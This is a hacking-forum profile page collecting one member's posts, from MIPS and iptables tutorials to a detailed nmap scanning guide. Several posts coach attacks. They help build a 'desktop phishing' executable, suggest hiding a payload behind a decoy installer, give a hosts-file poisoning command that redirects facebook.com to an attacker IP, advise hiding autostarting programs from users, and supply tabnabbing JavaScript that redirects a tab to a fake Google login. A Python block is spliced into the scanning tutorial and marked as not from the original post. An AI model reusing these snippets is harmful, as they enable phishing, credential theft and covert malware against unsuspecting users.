HackFreak

Members
  • Content count

    254
  • Joined

  • Last visited

About HackFreak

  • Rank
    Freak
  • Birthday 08/09/1992

Previous Fields

  • Programming languages
    C - C# - x86 Assembly - Javascript

Profile Information

  • Gender
    Male
  • Location
    /home/HackFreak
  • Interests
    Computer Programming, Networks, Computer Security
  1. HackFreak

    Pro Discovery

    You can find the ProDiscover free basic edition here: http://toorcon.techpathways.com/uploads/ProDiscoverRelease65Basic.zip If you are looking for a crack/serial, unfortunately I cannot help you because of the forum rules.
  2. Sorry for the untimely topic, but it is good for the solution to be available since someone may need it. So, spim supports some syscalls, among which are input/output of strings, bytes, integers etc. The philosophy is like in Linux: we put a syscall code in a register and the arguments (if any) in some other registers. In MIPS the syscall code usually goes in the $2 register, and the argument usually in $4. Below follows the example that our friend Thodoris asked for.

            .data
        string: .space 10          # 10-byte buffer for the string
            .text
            .globl main
        main:
            li $2, 8               # put the value 8 (read string) in register $2
            la $4, string          # put the memory address of the string in $4 (argument 1: buffer)
            li $5, 10              # buffer length in $5 (argument 2), so read_string knows where to stop
            syscall                # make the syscall
            li $2, 4               # put the value 4 (print string) in register $2
            la $4, string          # put the memory address of the string in $4 (argument)
            syscall                # make the syscall
            li $2, 10              # exit syscall
            syscall                # make the syscall
  3. HackFreak

    Desktop phishing

    Once you set the output directory, go to the Build menu and select "Build all". If there is an error in the code (which I don't see) it won't build and it will report it to you. Otherwise an executable will be created in the dir you set.
  4. HackFreak

    Desktop phishing

    Press the Browse button and then select the output directory.
  5. HackFreak

    Desktop phishing

    Go to Options -> Solution options -> Build -> General and select the output directory. Then go to the Build menu and select 'Build all'. If everything goes well, the executable will be in the output directory you set.
  6. HackFreak

    Contact Form

    You have to make sure that the address in the $to variable is correct. Also (if you are running Windows), you must put in php.ini a valid hostname/IP of an SMTP server which does NOT require authorization. If it requires authorization, then take a look here: http://email.about.com/od/emailprogrammingtips/qt/PHP_Email_SMTP_Authentication.htm That way you will be able (through the form) to send mail to hotmail, gmail etc. recipients, which require authorization.
  7. As surprising as it may be to you, it is true: http://www.youtube.com/watch?v=SEx6g-xt0CI
  8. HackFreak

    Startup Program

    For this purpose you can use the Bat2Exe converter, which can "compile" it for you (not a real compile but "packaging") and also gives you the ability to make an invisible application, to include other programs in the main program, etc. Now as for the startup issue, you can put the path of your application in the following registry path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Run using the DOS command "reg". Search for it and you will find it. And also, regarding the path it will be copied to, I don't suggest C:\windows but some path that the user has rights to access, such as temp, appdata etc., which are completely invisible to the average user. I have done something similar with binding, but it is in C#, I don't know if you are interested. http://www.s3cure.gr/index.php?showtopic=1372
  9. When someone wants to attack a computer system/network he/she must acquire some important information about the target in order to know what kind of attacks he will perform and which services he/she will attack in order to gain access. In order to gain information about what ports, services, OSes and versions are running on the target system, he will use a technique called Port Scanning. Port scanning consists of scanning a range of TCP/UDP ports and identifying which are active, what services are running on them, etc.

    In general, port scanning works like this:
    --> The attacker's computer attempts to connect to the target system at the target port
    --> The target system sends back a response
    --> Based on the response, the attacker knows if the port is open or closed.

    Port scanning techniques

    Now we will analyze the port scanning techniques. We will mostly discuss the stealth techniques, which are more difficult to track.

    --> TCP connect scan
    This is the simplest, but not stealthy, technique. It identifies if the port is open or closed by connecting to the target port using the operating system's network functions, analyzing the response from the target and identifying if it was open or closed. In order to get more in depth with this technique we must know how the TCP protocol works when we request a connection to the target port. We have two computers, computer A and computer B. Let's say that computer A wants to connect to computer B on TCP port 80. In order to do that, these steps happen (three-way handshake):
    --> Computer A sends a TCP SYN packet (the SYN flag is for connection request)
    --> Computer B responds by sending a SYN-ACK packet (acknowledgment)
    --> Computer A sends ACK and the connection has just started.
    So when the three-way handshake has been completed, computer A knows that the port is open.

    Now let's see if the port is not available:
    --> Computer A sends a TCP SYN packet (the SYN flag is for connection request)
    --> Computer B sends an RST packet and the connection is closed.
    The RST flag means Connection Reset. This means that the destination port is not available. So computer A knows that the port is not available.
    Advantages: Does not require higher-level privileges.
    Disadvantages: Easily tracked by the target.
    Here is a simple TCP connect() port scan tool written in C#: http://www.s3cure.gr/index.php?showtopic=1292
    ----------------------------------------------------------------------------------------------
    --> TCP SYN scan
    This type of scan does not use the operating system's default network functions but generates raw IP packets to make the port scan. So it requires higher-level privileges in the operating system. This technique does not even complete the three-way handshake but examines the packet sent by computer B. Let's see how the SYN scan works.
    --> Host A sends a SYN packet to host B.
    --> Host B sends a SYN-ACK packet if the port is open, or RST if the port is closed.
    So host A knows if the port is open or closed by examining the response.
    Advantages: Stealthier than the TCP connect() scan
    Disadvantages: Requires higher-level privileges
    ----------------------------------------------------------------------------------------------
    --> TCP FIN scan
    As we said, SYN scans are stealthier than the standard TCP connect() scan, but firewalls are able to identify them because of the SYN flag. So another, stealthier technique is the TCP FIN scan. The technique works as follows.
    --> Host A sends a FIN packet to host B (the FIN flag means finish connection)
    --> Host B ignores the request if the port is open, or sends an RST packet if the port is closed.
    Advantages: Stealthier than the SYN scan
    Disadvantages: Requires high-level privileges; Windows OS is immune to this technique
    ----------------------------------------------------------------------------------------------
    --> TCP NULL scan
    The TCP NULL scan does not contain any TCP flags in the packet; that's why it is named null. The technique works like this:
    --> Host A sends a NULL TCP packet to host B
    --> Host B sends an RST TCP packet if the port is closed, or nothing if the port is open.
    Advantages: Stealth
    Disadvantages: Requires higher-level privileges.
    --> The Xmas tree scan
    This technique works by sending a TCP packet with the URG, PUSH and FIN flags set. This is very similar to the TCP FIN port scan.
    --> Host A sends a TCP packet with the URG, PUSH and FIN flags set.
    --> Host B sends nothing if the port is open, or a TCP RST when the port is closed.
    Advantages: Stealth
    Disadvantages: Requires higher-level privileges
    ----------------------------------------------------------------------------------------------
    --> Idle scan
    The idle scan is the most complicated technique in port scanning. It exploits a flaw in the IP mechanism. Every IP packet has an IP identification number which is just incremented for every packet sent. The idle port scan works by using an idle zombie host. It must be idle in order to get the right IP IDs. The idle scan works in these steps:
    --> First probe the IP ID number of the zombie
    --> Forge a SYN packet from the zombie and send it to the target port on the target. Depending on the port state, the target's reaction may or may not cause the zombie's IP ID to be incremented.
    --> Probe the zombie's IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.
    Now if the IP ID has increased by one then probably the port is not open, because the zombie hasn't sent any packets except for its reply to the attacker's probe. An increment of two means that the zombie has sent another packet besides its reply to the attacker's probe, meaning that the port is open. This means that the target has sent a SYN-ACK to the zombie, so the zombie replied with an RST packet. As you can see it is complicated, but much stealthier than the other techniques.
    Advantages: Stealthier than other techniques
    Disadvantages: Complicated, needs an idle zombie
    ----------------------------------------------------------------------------------------------
    --> UDP scan
    The UDP scan uses the UDP protocol, which is a connection-less protocol, which makes it way simpler than the TCP protocol. There are no flags here as there were in TCP, so the scanning process is much simpler. Let's explain how UDP works first... Well, UDP is a connection-less protocol, which means it does not have error or flow control mechanisms, nor flags. UDP sends its messages via the ICMP protocol. ICMP is a protocol responsible for transmitting messages over IP networks. Now let's see how the UDP scan works:
    --> Host A sends a UDP packet to host B
    --> Host B sends an ICMP "Port unreachable" packet if the port is closed, or sends nothing if the port is either open or filtered.
    If host A is able to receive data then host A knows that host B has this port open.
    Those were the most common techniques in port scanning.

    --> Port scanning in practice
    Tired of so much theory? Well, don't worry, because we are getting to the practice part. We will introduce the most powerful tool for port scanning, nmap, and we will learn how to use it with the different port scanning techniques. The most common port scanners are:
    --> Nmap (Linux / Windows)
    --> Superscan (Windows)
    --> Advanced Port Scanner (Windows)
    --> Angry IP Scanner (Linux / Windows)
    In this tutorial we will use nmap for our port scanning job.

    First, if you don't already have nmap, download it from here. We will use the command-line version, so if you have Windows fire up cmd and if you have Linux fire up the terminal. In Windows type cd <the path you installed nmap>, and then type "nmap.exe". In Linux you don't need to cd to a directory, just type "nmap" ...and you will see nmap's help screen. Generally the usage of nmap is:
        nmap [option parameters] [host]

    --> TCP connect() scan
    As we said in the theory, this is the simplest technique of port scanning. Well, it is even simpler in nmap. Just hit in the command line:
        nmap -sT "target IP/host here"
    So for example if I want to scan my home router 192.168.2.1 I will do:
        nmap -sT 192.168.2.1
    and I will get this result:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 15:53 EEST
        Nmap scan report for 192.168.2.1
        Host is up (0.026s latency).
        Not shown: 994 closed ports
        PORT     STATE SERVICE
        23/tcp   open  telnet
        53/tcp   open  domain
        80/tcp   open  http
        1050/tcp open  java-or-OTGfileshare
        1234/tcp open  hotline
        5555/tcp open  freeciv
    As you can see, we can clearly see the open ports, the state and the service. The state can be open, filtered or closed.

    --> TCP SYN scan
    Doing a SYN scan is as simple as the TCP connect() scan. Just type in the command line:
        nmap -sS 192.168.2.1
    and we will get the same results, with the difference that the port scanning requests won't be so easily tracked.
    ----------------------------------------------------------------------------------------------
    --> TCP FIN scan
    In order to perform a TCP FIN scan we enter the following command:
        nmap -sF 192.168.2.1
    but this time we get:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:03 EEST
        Nmap scan report for 192.168.2.1
        Host is up (0.021s latency).
        Not shown: 994 closed ports
        PORT     STATE         SERVICE
        23/tcp   open|filtered telnet
        53/tcp   open|filtered domain
        80/tcp   open|filtered http
        1050/tcp open|filtered java-or-OTGfileshare
        1234/tcp open|filtered hotline
        5555/tcp open|filtered freeciv
    That's because nmap cannot tell whether the ports are open or filtered by a firewall. Now if I try to port scan my Windows machine (192.168.2.40) I will get this:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:34 EEST
        Nmap scan report for 192.168.2.40
        Host is up (0.00065s latency).
        All 1000 scanned ports on 192.168.2.40 are closed
    That's because Windows sends an RST packet whether the port is closed or open, so nmap shows all ports as closed.
    ----------------------------------------------------------------------------------------------
    --> TCP NULL scan
    To perform a NULL scan just type:
        nmap -sN 192.168.2.1
    but I get:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:08 EEST
        Nmap scan report for 192.168.2.1
        Host is up (0.00033s latency).
        All 1000 scanned ports on 192.168.2.1 are open|filtered
    which is a false positive. I think that my router's OS sends the same RST packet back to me, so that's why I get those. So let's try another host, for example www.google.gr:
        nmap -sN www.google.gr
    and the result:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:22 EEST
        Nmap scan report for www.google.gr (209.85.229.104)
        Host is up (0.087s latency).
        Not shown: 997 filtered ports
        PORT    STATE  SERVICE
        80/tcp  open   http
        113/tcp closed auth
        443/tcp open   https
    We get the right results. That's because the Google server runs an OS which sends RST responses in case of closed ports and nothing in case of open ports.
    ----------------------------------------------------------------------------------------------
    --> TCP Xmas scan
    Now we will perform the TCP Xmas scan. In order to use it we use the following command:
        nmap -sX 192.168.2.1
    The results are the same as with the FIN scan, as expected:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:31 EEST
        Nmap scan report for 192.168.2.1
        Host is up (0.023s latency).
        Not shown: 994 closed ports
        PORT     STATE         SERVICE
        23/tcp   open|filtered telnet
        53/tcp   open|filtered domain
        80/tcp   open|filtered http
        1050/tcp open|filtered java-or-OTGfileshare
        1234/tcp open|filtered hotline
        5555/tcp open|filtered freeciv
    Advantages: Stealth
    Disadvantages: Requires higher-level privileges
    ----------------------------------------------------------------------------------------------
    --> Idle scan
    In order to perform an idle scan we first need an idle zombie computer. When I say idle I mean that it is not network busy. In order to find a good zombie we use this command first:
        nmap -sS -O -v [target]
    Where:
    -sS means scan with SYN scan. Can be any port scanning technique.
    -O Operating system detection
    -v Verbose
    [target] the target zombie.
    In the response we are looking for IP ID Sequence Generation. This field shows how IP IDs are incremented. If nmap shows us "IP ID Sequence Generation: Incremental" or "IP ID Sequence Generation: Broken little-endian incremental" then the machine is a good zombie. Once we have found a zombie we use this command to perform the scan:
        nmap -sI zombie:port [target]
    In my situation I give:
        nmap -sI 192.168.2.40:139 192.168.2.40
    and I get:
        WARNING: Many people use -PN w/Idlescan to prevent pings from their true IP. On the other hand, timing info Nmap gains from pings can allow for faster, more reliable scans.
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:55 EEST
        Idle scan using zombie 192.168.2.40 (192.168.2.40:139); Class: Incremental
        Nmap scan report for 192.168.2.1
        Host is up (0.050s latency).
        Not shown: 994 closed|filtered ports
        PORT     STATE SERVICE
        23/tcp   open  telnet
        53/tcp   open  domain
        80/tcp   open  http
        1050/tcp open  java-or-OTGfileshare
        1234/tcp open  hotline
        5555/tcp open  freeciv
    We see the same results as in the standard SYN scan. But notice that nmap warns us to use the -PN option so that our host does not send a ping to the target. This can reveal our true IP. So we can use this syntax:
        nmap -PN -sI 192.168.2.40:139 192.168.2.1
    OK, I think the idle scan with nmap is much easier than in theory :)
    ----------------------------------------------------------------------------------------------
    --> UDP scan
    In order to perform a UDP scan we use the following syntax:
        nmap -sU [target]
    In my case:
        nmap -sU 192.168.2.1
    And the result:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 17:09 EEST
        Nmap scan report for 192.168.2.1
        Host is up (0.0024s latency).
        PORT   STATE SERVICE
        53/udp open  domain

    Nmap OS detection, spoofing, custom ports
    Now we will see some other functions of nmap, such as OS detection, etc. In order to guess the operating system of the target we use the -O option. The syntax is like this:
        nmap -O [target]
    For example:
        nmap -O 192.168.2.1
    Output:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 17:13 EEST
        Nmap scan report for 192.168.2.1
        Host is up (0.0017s latency).
        Not shown: 994 closed ports
        PORT     STATE SERVICE
        23/tcp   open  telnet
        53/tcp   open  domain
        80/tcp   open  http
        1050/tcp open  java-or-OTGfileshare
        1234/tcp open  hotline
        5555/tcp open  freeciv
        MAC Address: 00:1C:A8:7F:4C:CC (AirTies Wireless Networks)
        Device type: general purpose
        Running: Linux 2.4.X
        OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
        Network Distance: 1 hop
    As you can see, we see that the target runs Linux 2.4.x. And of course we can embed that parameter in our scans, for example:
        nmap -sS -O 192.168.2.1

    --> Service detection
    There are times when we need to know what kind of service (and version) each port runs. We can do this with nmap using the -sV parameter. An example:
        nmap -sV -sS 192.168.2.40
    Output:
        Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 17:24 EEST
        Nmap scan report for 192.168.2.40
        Host is up (0.00042s latency).
        Not shown: 984 closed ports
        PORT    STATE SERVICE VERSION
        135/tcp open  msrpc   Microsoft Windows RPC

    --> Spoofing
    Nmap gives us the ability to spoof our source address for the scanning, with the -S parameter. So for example if we wanted to scan 192.168.2.1 with source address 224.225.226.227 we would type:
        nmap -e eth0 -S 224.225.226.227 192.168.2.1
    Where:
    -e eth0 our interface. Needed when IP spoofing
    -S 224.225.226.227 the spoofed IP address
    192.168.2.1 the target

    --> Port ranges
    When scanning with nmap we can specify ports or port ranges to scan. This is done with the -p option. The full syntax will be like this:
        nmap -p 20-22 192.168.2.1
    This will scan from port 20 to port 22, and of course we can specify a single port:
        nmap -p 22 192.168.2.1

    --> Conclusion
    In this tutorial we saw the basic port scanning techniques and stealth techniques, and used them to port scan with the nmap port scanner. We also saw some of nmap's basic but powerful features. I hope you got something from this tutorial even though it explains only the basics, because nmap has many, many options which, when combined, let you do "miracles". Please report any mistakes in this article!
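    The decision rules the post gives for each technique (SYN-ACK/RST for SYN-based scans, RST-or-silence for FIN/NULL/Xmas, the ICMP unreachable for UDP, the IP ID delta for the idle scan) written out as an added example in Python; this is not code from the original post. Names such as tcp_state, idle_state and parse_nmap_report are assumptions, and the sample nmap report is constructed in the layout of the outputs quoted above.

```python
"""Port-state inference for the scan techniques described in the post.

Added example (not code from the original post). It models a single probe
and the reply it gets for each technique and returns the state nmap would
report, so the decision rules above can be checked, including the cases
where the answer is inherently ambiguous (open|filtered), the idle-scan
IP ID delta, and the "all ports closed" pattern the post saw on Windows.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple, Union

# TCP flag bits as laid out in the TCP header (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


@dataclass(frozen=True)
class TcpReply:
    flags: int                 # flag bits of the reply segment, e.g. SYN | ACK


@dataclass(frozen=True)
class IcmpPortUnreachable:
    pass                       # ICMP type 3 code 3, the only conclusive UDP "closed" signal


@dataclass(frozen=True)
class UdpData:
    payload: bytes             # the service answered, so the port is open


Reply = Union[TcpReply, IcmpPortUnreachable, UdpData, None]

# Flags each technique puts in its probe; "connect" and "syn" both send SYN.
PROBE_FLAGS = {"connect": SYN, "syn": SYN, "fin": FIN, "null": 0, "xmas": URG | PSH | FIN}


def tcp_state(scan: str, reply: Reply) -> str:
    """Classify one TCP port from the reply to a single probe of the given scan type."""
    probe = PROBE_FLAGS[scan]
    if reply is not None and not isinstance(reply, TcpReply):
        raise TypeError("TCP scans expect a TcpReply or no reply")
    if probe == SYN:
        # SYN-based scans get a definite answer either way; silence means a filter.
        if reply is None:
            return "filtered"
        if reply.flags & RST:
            return "closed"
        if reply.flags & (SYN | ACK) == SYN | ACK:
            return "open"
        return "filtered"
    # FIN, NULL and Xmas: RFC 793 closed ports answer RST, open ports stay silent,
    # but a firewall that drops the probe is also silent, hence the ambiguous state.
    if reply is not None and reply.flags & RST:
        return "closed"
    return "open|filtered"


def udp_state(reply: Reply) -> str:
    """Classify one UDP port: only an ICMP unreachable or real data is conclusive."""
    if isinstance(reply, IcmpPortUnreachable):
        return "closed"
    if isinstance(reply, UdpData):
        return "open"
    return "open|filtered"


def idle_state(ipid_before: int, ipid_after: int) -> str:
    """Idle scan: the zombie's IP ID is a 16-bit wrapping counter. +1 means only our
    probe was answered; +2 means the zombie also RST'd a SYN-ACK from the target."""
    delta = (ipid_after - ipid_before) & 0xFFFF
    if delta == 1:
        return "closed|filtered"
    if delta == 2:
        return "open"
    return "unknown"           # zombie was not idle, so the measurement is unusable


def rst_scan_looks_unreliable(states: Dict[int, str]) -> bool:
    """The post's FIN scan of a Windows host reported every port closed: a stack that
    RSTs regardless of port state makes FIN/NULL/Xmas results meaningless."""
    return bool(states) and all(s == "closed" for s in states.values())


# One "PORT STATE SERVICE" row of nmap's normal output, e.g. "23/tcp open|filtered telnet".
NMAP_PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)


def parse_nmap_report(text: str) -> List[Tuple[int, str, str, str]]:
    """Extract (port, proto, state, service) rows from nmap's normal output."""
    return [(int(p), proto, state, svc) for p, proto, state, svc in NMAP_PORT_LINE.findall(text)]


# Constructed sample in the same layout as the outputs quoted in the post.
SAMPLE_FIN_REPORT = """\
Nmap scan report for 192.168.2.1
Host is up (0.021s latency).
Not shown: 994 closed ports
PORT     STATE         SERVICE
23/tcp   open|filtered telnet
80/tcp   open|filtered http
"""
```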
  10. HackFreak

    Desktop phishing

    Very nice article pr0n. However, I would like to make an addition... On the binder topic, we don't even need to use a binder, because quite simply we can do it through .NET. Yes, .NET naturally offers the ability for the executable to have resources. These resources can be images, music, and of course executables and generally any file, which we can drop into some temporary folder (e.g. temp) and then execute. So in the resources of our bad file we can also put a "good" one which will be shown, an installer for example. While the victim does the install the "job" will have been done. I made a tutorial some time ago which you will find here: http://www.s3cure.gr/index.php?showtopic=1372 I would also like to say that apart from C# we can implement something like this in batch with one command: echo [attacker ip] www.facebook.com>>"%systemroot%\system32\drivers\etc\hosts"
  11. And of course there is also the Rainbow tables method, which is much more effective than the rest, since it can have the results of a brute force attack in much less time; a 5-character mixed hash on my own system was cracked in ...a few secs. Of course the price here is the system's main memory, since this technique uses precompiled hashes in tables, which means that it will need quite a lot of RAM (depending on what kind of table we use: text size, min length, max length etc.).
  12. The attack is very clever, but it is not going to work against all kinds of people :D I have created a piece of JavaScript code that is much smaller and does the same thing. Consider that the attacker has a site http://phiser.com/ with a fake Google login page, of course exactly like Google's. It looks like the Google login page. In the evil site the JavaScript code would be as follows:

        <html>
        <head>
        <script type="text/javascript">
        window.onblur = function() { setTimeout("redirect()", 5000) };
        function redirect() { window.location.href = 'http://phiser.com/'; }
        </script>
        </head>
        This is the evil site. Put anything here!!!
        </html>

    So when the victim switches to another tab, the old tab will be redirected in 5 seconds to the evil Google login page... The effects are the same as with the original code... As for the second kind of attack, the odds are not with the attacker, because I don't think somebody will forget that he was waiting ...for a page redirect... Yeah, some people may fall for the trick, but most of them won't.
  13. HackFreak

    Linux iptables tutorial

    Greetz to all p0wnbox members, Many of Linux distros come with a powerfull firewall built-in. It is a kernel module called netfilter. To control netfilter Linux has built-in a command-line application for the user to specify his custom rules. There are many graphical front-ends to iptables but better for you to learn iptables itself as it gives you more control. In this topic i will produce the Linux iptables application. I will produce some of it's features and how to combine them to learn to build custom firewalls. With iptables you specify some rules about the network packets in the local computer. You can block-accept-forward a packet based on some criteria you specify. For example based on the IP address, port number, protocol etc... How iptables works Well iptables are actually a tool from which we define rules in netfilter, a kernel module which does the filtering based on the rules set with iptables. Based on the actions the netfilter decides what to do with the packet. Iptables has tables in which there are contained chains, and the chains there are rules. The rules are "conditions" that "tell" netfilter what to do with the packet specified by some criteria we specify. When a packet arrives it is checked upon all rules in chain one by one. If a match occurs, then a specified action is called for the packet. ACCEPT, DROP, or even another chain created by the user. If no match occurs then the default action is being taken. Also a rule in a chain can make a call to another chain. Those are the 3 built-in tables in iptables: * FILTER - The default table for handling network packets. Usually we use this * NAT - Used to deal with packets that create a new connection and used for Network Address Translation (NAT). * MANGLE - Used for specific purposes. As we told above each table has chains in it. 
Well the built-in chains for "filter" table are: * INPUT - The network packets that are designated for this host * OUTPUT - The network packets that are from this host * FORWARD - The network packets that are not designated for this host neither, from this host Built-in chains for nat table: * PREROUTING - Network packets when they arrive * OUTPUT - The network packets that are from this host * POSTROUTING - The network packets before they send. Built-in chains for mangle table: * INPUT — The network packets targeted for the host. * OUTPUT — The locally-generated network packets before they are sent out. * FORWARD — The network packets routed through the host. * PREROUTING — The incoming network packets before they are routed. * POSTROUTING — The network packets before they are sent out. So for example if we want to deal with a packet that "comes" on our computer we should use the INPUT chain and so on... Getting to the real stuff First of all if you have not a terminal open fire it up now. The first thing to do is to show the help of the iptables. To do so just type: iptables --help If all is ok you should see something like this output: $ iptables --help iptables v1.4.5 Usage: iptables -[AD] chain rule-specification [options] iptables -I chain [rulenum] rule-specification [options] iptables -R chain rulenum rule-specification [options] iptables -D chain rulenum [options] iptables -[LS] [chain [rulenum]] [options] iptables -[FZ] [chain] [options] iptables -[NX] chain iptables -E old-chain-name new-chain-name iptables -P chain target [options] iptables -h (print this help information) ... iptables is build-in in most Linux distros, however if you don't see the above output then you probably do not have iptables installed on your system. You can download it from here: ftp://ftp.netfilter.org/pub/ Once is all ok we are ready to continue... NOTE: After any changes made with iptables in order for the rules to load for the next reboot we must save them. 
The problem here is that the command is not the same on all linux distros. For example in debian is: /etc/init.d/iptables save_active In Fedora: /sbin/service iptables save You should make a search in order to find the way for your own distro. First of all we want to see if any rules are set up in our system. This is important cause you may be have any rules defined and forgotten, and whatever we must know how to do it :) We will do it with the following command: iptables -L And we will see something like this: $ iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED ACCEPT icmp -- anywhere anywhere ACCEPT all -- anywhere anywhere ACCEPT tcp -- anywhere anywhere state NEW tcp dpt:ssh REJECT all -- anywhere anywhere reject-with icmp-host-prohibited REJECT all -- 192.168.2.0/24 anywhere reject-with icmp-port-unreachable Chain FORWARD (policy ACCEPT) target prot opt source destination REJECT all -- anywhere anywhere reject-with icmp-host-prohibited Chain OUTPUT (policy ACCEPT) target prot opt source destination As you can see we can see the rules for chain INPUT, FORWARD, OUTPUT. Well those rules are default except the last line of INPUT chain, which is my rule, where i REJECT, ICMP packets from all computers in my subnet which is 192.168.2.0 Now if we want to delete all rules we should do it with the following command: iptables -F WARNING: Check if you have any important rules. If you use your computer as a firewall router or whatever this will ruin it. 
Now if list again the rules i will have the following output: Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED ACCEPT icmp -- anywhere anywhere ACCEPT all -- anywhere anywhere ACCEPT tcp -- anywhere anywhere state NEW tcp dpt:ssh REJECT all -- anywhere anywhere reject-with icmp-host-prohibited REJECT all -- 192.168.2.0/24 anywhere reject-with icmp-port-unreachable Chain FORWARD (policy ACCEPT) target prot opt source destination REJECT all -- anywhere anywhere reject-with icmp-host-prohibited Chain OUTPUT (policy ACCEPT) target prot opt source destination [[email protected] Desktop]# iptables -F [[email protected] Desktop]# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination As you can see only the default rules remained. Well, now let's continue with iptables preferred chains. As you know preferred chains are INPUT, OUTPUT, FORWARD. We can set their default policy(action) from those chains and of course for every chain we have. We set default policies with the -P option. So to block all input packets that won't match any rule in INPUT chain we should issue this command: iptables -P INPUT DROP CAUTION: If you have not set upt any rules on the INPUT chain all incoming packets will be blocked!!! We could do this for any chain. If we were to block all outgoing packets we should replace INPUT with OUTPUT etc... Now in the most casual computers we should issue this command with safety: iptables -P FORWARD DROP This indicates that no packets are forwarding through our computer. Since our computer is not use as a router this is safe to use. Blocking packets vis protocols Well now we will get more in depth of iptables. We are going to block various protocols in our computer. 
The syntax to block an incoming protocol is the following: iptables -A INPUT -p <Protocol name> -j DROP Parameters explanation: -A INPUT specifies the chain. We use the INPUT chain to block all incoming packets -p <Protocol name> specifies the protocol we wanna block. Can be icmp, udp, tcp, or all -j DROP specifies the action to do with that rule. In this case we just drop it In the first example i will block all incoming ICMP packets so anyone won't be able to ping the computer. iptables -A INPUT -p ICMP -j DROP This will block all incoming icmp packets. Now if i try to ping the local computer with IP 192.168.2.29 i get: $ ping 192.168.2.29 PING 192.168.2.29 (192.168.2.29) 56(84) bytes of data. ^C --- 192.168.2.29 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 4273ms As you can see i have 100% packets loss which means that the packets are rejected. So, if wanted to block for example all udp traffic you should replace "icmp" with "udp". If you wanna block all supported protocols just enter "all". Making rules via ports Now we will learn how to manage rules based on port number As you know when a tcp(or udp) connection is made both source and destination ports are needed. The destination port is the port that the remote machine is listening to and the source port is a random number which is opened in the machine making the connection. In order to block a packet coming to a specified destination port in a machine we use the following syntax: iptables -A INPUT -p tcp --dport 25 -j DROP Parameters explanation: -A INPUT specifies the input chain(incoming packets) -p tcp specifies the protocol in this example tcp(or udp) --dport 25 specifies the destination port -j DROP specifies to drop the packet Now anyone that tries to connect to this port it will get a "Connection refused" message We can also specify ranges of ports. 
For example we wanna to block the port range 25-80 To do that we use the following: iptables -A INPUT -p tcp --dport 25:80 -j DROP Now all tcp ports from port 25 to port 80 will be blocked. The largets valid range is from port 0-65535. Now we will see blocking based on source port. This is not as usefull but i think tha tyou must know it. To block using source ports we use the following syntax as "--dport" except that we use the "--sport" First of all i want to tell that source ports are in this range: 49152-65535 Those ports also called private ports and they are used only for client and temporary connections. So to do the obove example with --sport we issue the following command: iptables -A INPUT -p tcp --dport 50000:65000 -j DROP In this example we block all clients with source port from 50000 to 65000. For UDP things are the same except that we change the "-p tcp" option to "-p udp". Getting more in depth with the TCP protocol First let me explain some basic things about the TCP protocol. When a client requests a TCP connection with the server he sends a TCP with a SYN flag. This flag indicates the the client requests connection. The server then answers with a TCP packet with SYN-ACK flag. Then the client sends a ACK flag and the connection is started. iptables has an option "--syn" which specifies the packets with the syn flag. So say for example we wanna to block all incoming syn packets we would issue this command: iptables -A INPUT -p tcp --syn -j DROP Params explanation: -A INPUT means incoming packets -p tcp specifies the tcp protocol --syn specifies that it is a syn packet -j DROP means "drop the packet" So all connection initiliazations in our computer will be blocked. Well, now let's block all outcoming initilization packets. iptables -A OUTPUT -p tcp --syn -j DROP Now if we try to make any tcp connection we won't archive that because all initiliazation packets are rejected. We changed only the chain name, so that output packets are affected. 
iptables allows us not only to identify syn packets but to identify any flag set in the TCP packet. This is done using the "--tcp-flags" option. The TCP flags are:
* ACK
* FIN
* PSH
* RST
* SYN
* URG
* ALL
* NONE

You can find more info about the flags and the TCP protocol here.

Well let's go beyond... the "--tcp-flags" option takes two arguments. The first is a list of flags to check and the second is the flags which must be set in order for the rule to match. So for example to block all incoming tcp packets with the SYN flag set we should issue the following command:

iptables -A INPUT -p tcp --tcp-flags SYN SYN -j DROP

Where:
-A INPUT indicates input packets
-p tcp the 'tcp' protocol
--tcp-flags the flags to be matched
-j DROP the rule for this criteria

So any tcp connection request (tcp syn packet) will be blocked. So no connections to our computer. Very useful for a home pc that does not offer any server services.

Making rules using ip addresses and ip ranges

Well iptables offers us the use of ip addresses to make our firewall rules. And this is very useful if we want to block some "bad" ip addresses - ranges. For an ip to match we use the '-s' option, along with the ip address-range in the format -s <ip address-range>. So for example to block incoming icmp packets from all computers in the subnet 192.168.2.0, we use the following command:

iptables -A INPUT -p icmp -s 192.168.2.0/24 -j DROP

The '/24' indicates the CIDR. The CIDR specifies the subnet mask, which is the number of network bits. In this case it's 24 bits for the network part and 8 for the computer. This CIDR is very common on small home LANs.
More info here: http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing

If we wanted to block a single ip address we should issue the following:

iptables -A INPUT -p icmp -s 192.168.2.3 -j DROP

Working with our own chains

As you already know iptables has 3 built-in chains:
* INPUT
* OUTPUT
* FORWARD

But there are many times when we need to add our own chains with our own rules. For example we may want to create a chain which will block specific ports, etc. In order to create a chain the syntax is this:

iptables -N <chain name>

Now for a real example. I will create a chain named BlockEm which will block specific ports. First we create the chain:

iptables -N BlockEm

G00d!! We have the chain ready. Now let's add some rules.

iptables -A BlockEm -p tcp --dport 80 -j DROP
